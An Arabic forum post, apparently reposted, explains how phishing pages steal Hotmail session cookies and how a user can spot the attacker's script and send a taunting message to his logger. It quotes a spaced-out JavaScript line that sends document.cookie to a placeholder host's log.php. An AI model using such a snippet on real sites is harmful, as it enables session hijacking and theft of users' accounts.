نادي الهلال السعودي - شبكة الزعيم - الموقع الرسمي - وداعا لسرقة بريد الهوت ميل بملف سرقة الكوكيز (شرح كامل و حصرى )

سلام عليكم ورحمة اللة وبركاتة
كيفك ياجماعه الخير
:::::::
طبعا اكيد كلكم تعرفون الفترة الاخيرة وراعيين الهكر ماغير يخترقو ايميلات خلق الله بسبب ثغرة خطيرة وبسيطة اللي هي الكوكيز
:::::::::
هذا شرح كامل وان شاء الله تستفيدو منه وانا بعد استفدت
الدرس منقول :060:
:::::::
بسم الله الرحمن الرحيم
اليوم سويت شرح كافى لموضوع سرقة بريد الهوت ميل
وهى طريقة سرقة ملف الكوكيز الخاص بيك بعد دخولك على موقع السارق
:bleh:
ماعلينا اليوم بعد مهتقرء الموضوع ده انسى ان اى هاكر يضحك عليك تانى
:)
نبتدى الشرح
نفترض دلوقتى ان جاتلك رساله على بريدك ومضونها
اهلا بيك يا فلان
مبروك ربحت 5 جنيه معانا :bigsmile:
ادخل بسرعة على الرابط ده عشان تاخد ال5 جنيه :)
www.xxx.com
طبعا انت فرحت ودخلت علطوووووووووول:bigsmile:
وبعد مدخلت ملقيتش الخمسة جنيه :msq1s43:
ولقيت صفحة بيضه :039:
قولت يا خساره مليش نصيف فى الخمسه جنيه وقومت خارج
طبعا بعدها بدقايق كان المختر جاتله رساله ملف الكوكيز بتاعك
ودخل غير كل البيانات بتاعتك :crazy:
وراح الاميل عليك طبعا انت هتقول
الاميل انا كنتحميه وعمرى ماقبلت من حد حاجه وازاى اميلى يتسرق
وبعدها طبعا السارق دخل سحب باقى البيانات ومنها الدومين
واخترق منتداك كمان
وكل ده من اميلك
لالالا لا
:bleh: دلوقتى بقى انا هخليك انت الى تضحك عليه وتحرق دمه :bleh:
خليكو معايا وانتبهو جيدا
http:///neencom/up/up/1asd.gif
ده مثلا الرساله الى جتلك وكان فيها رابط
اوعى اوعى استنى رايح فين :crazy: متفتحش الرابط
افتحه بعد متعمل الشرح ده
دوس على tools وبعد كده انتر نت اوبشن اخى خيار
http:///neencom/up/up/2assd.gif
بعد كده
http:///neencom/up/up/3asd.gif
بعد كده ادخل وعطل خاصية الجافا سكربت
http:///neencom/up/up/4wef.gif
الان انت فى امان ولو فتحت الصفحة مش هينسرق ملف الكوكيز بتاعك
ادخل على الصفحة بقلب جامد بعد التاكد من ان خاصية الجافا وجعلها دىاسبلاى
طب بعد دخولك الصفحة ملقيتش حاجه او عايز تتاكد انت ده مش واحد عايز يسرقاميلك تعمل ايه
اقف فى وسط الصفحة ودوس كليك يمين
واختار view sours
هتجيلك صفحة نوت باد
وفيها اكواد وحاجات
المهم دور على الكود ده
http:///neencom/up/up/5sda.gif
طبعا اكيد انتم شيفين ده عباه عن كود وفى اخره رابط الاسكربت بتاع المخترق حتى يسرق الكوكيز
وده هو الملف بتاع سرقة الكوكيز ممعمول بخاصية الجافا سكربت عشان كده قولتلك اقفل الجافا
http:///neencom/up/up/6wef.gif
طبعا انت شوفتو الرابط الى فى اخر الكود
www.xxx.com/vb/add.js
طب دلوقتى انت عرفت المصدر
دلوقتى بقى انت عايز تحرق دمه
:santa_1:
وتعرفه انك انسان عاقل وفاهم :022:
ادخل على المتصفح
وحط الرابط ده
www.xxx.com/vb/add.js
هيطلب منك انك تحمله
حمله على جهازك
ودوس على الملف اوبن وز وافتحه فى النوت باد
http:///neencom/up/up/7wqa.gif
طبعا انت دخلت على ملف الجافا سكربت لقيته كده
طبعا انت مش فاهم ايه ده ؟؟؟؟؟؟
اقولك انا يا سيدى
ده ملف سرقة الكوكيز
ما علينا مش هطول عليكم وهقولكم الباقى
عايز دلوقتى تجنينه وتخنقه وتخليه يشيييييييييط
:crazy:
lo cat ion .h ref='http://www.xxxx.com/xxx/log.php?in de x='+escape(d ocu ment.c oo kie);
طبعا هو فى الملف log.php فيه اميل المخترق
طب دلوقتى احنا عيزين نوصله التحية بتاعتنا ونعرفه ان لعبته اتقفشت :bleh:
هتكتب
http://www.xxxxx.com/xxx/log.php?index='"]www.xxxxx.com/xxx/log.php?index='[/URL] وهنا اكتب الكلام الى عايزه يوصل للضحية
مثل
http:///neencom/up/up/8qwd.gif[/CENTER]

http://www.xxxxx.com/xxx/log.php?index='"]www.xxxxx.com/xxx/log.php?index='[/URL] يا اهبل العب غيرها ( دكتور منشى)

[CENTER]طبعا علطول بيروح تبيلغ للهاكر ان الكوكيز بتاع جاله :shiny01:
وهيدخل وهو مبسوط
وهيلاقى فى الرساله بضل الكوكيز الكلام بتاعك
http:///neencom/up/up/9wqdq.gif
طبعا هو ممكن ينفجر من الغيظ :crazy:
وطبعا مش هيقدر يقرارها معاك تانى:nosweat:
ونصيحة للجميع
1عمل للاميل سؤال واجابه
2 اميل التبيلغ فى حالة استرجاع الباس
3 تغيرالباس ديما حينا دخولك اى صفحة غير موثوق فيها
4 تنزيل برنامج حماية للجهاز للحماية من ملفات التجسس
وكذا يكون اميلك اتحمى بدرجة ميه ميه

لاتقل شكراً وانما جزاك اللة خيراً